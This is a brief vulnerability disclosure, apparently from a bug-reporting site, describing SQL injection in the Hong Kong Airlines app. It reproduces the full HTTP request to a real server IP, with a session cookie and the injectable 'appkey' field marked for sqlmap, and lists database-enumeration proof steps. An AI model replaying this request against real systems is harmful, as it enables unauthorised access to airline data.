The Hong Kong Airlines APP has the SQL Injection Vulnerability (which can span 32 databases)

The Hong Kong Airlines APP has the SQL Injection Vulnerability (which can span 32 databases)

Aviation security-Hong Kong Airlines APP Injection

Detailed description:

Objective: To launch the Hong Kong Airlines APP
Check that SQL Injection exists in the following places: (appkey in POST, error injection, Boolean/time blind injection)

POST http://115.182.68.136/hkbaobiao/index.php?/ums/postActivityLog HTTP/1.1Host: 115.182.68.136Cookie: ci_session2=a%3A5%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%2230c5cd9cff294ebaed87a7f9ae048ea7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%2216.185.27.78%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A50%3A%22Googlebot%2F2.1+%28%2Bhttp%3A%2F%2Fwww.googlebot.com%2Fbot.html%29%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1446130187%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3B%7D1e5be70955604afbbc1726eec542afbeAccept-Encoding: gzip,deflateContent-Length: 317Content-Type: application/x-www-form-urlencodedConnection: keep-aliveAccept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0content={"activities":".activitys.SuNotifyActivity","appkey":"2603d8079e7783ba9e1d79c1d0438f49*","duration":6083,"end_millis":"2015-10-29 22:59:47","session_id":"5b1f3e159bb7282d1702cba07bf6bd65","start_millis":"2015-10-29 22:59:41","version":"3.2.1"}

Proof of vulnerability:

1. SQLMap vulnerability proof

2. Current Database User

3. Current Database

4. list all databases, 32 in total

5. List the tables of the aio_umsdata Database

The rest will not go deep ~

Solution:

Please kindly advise ~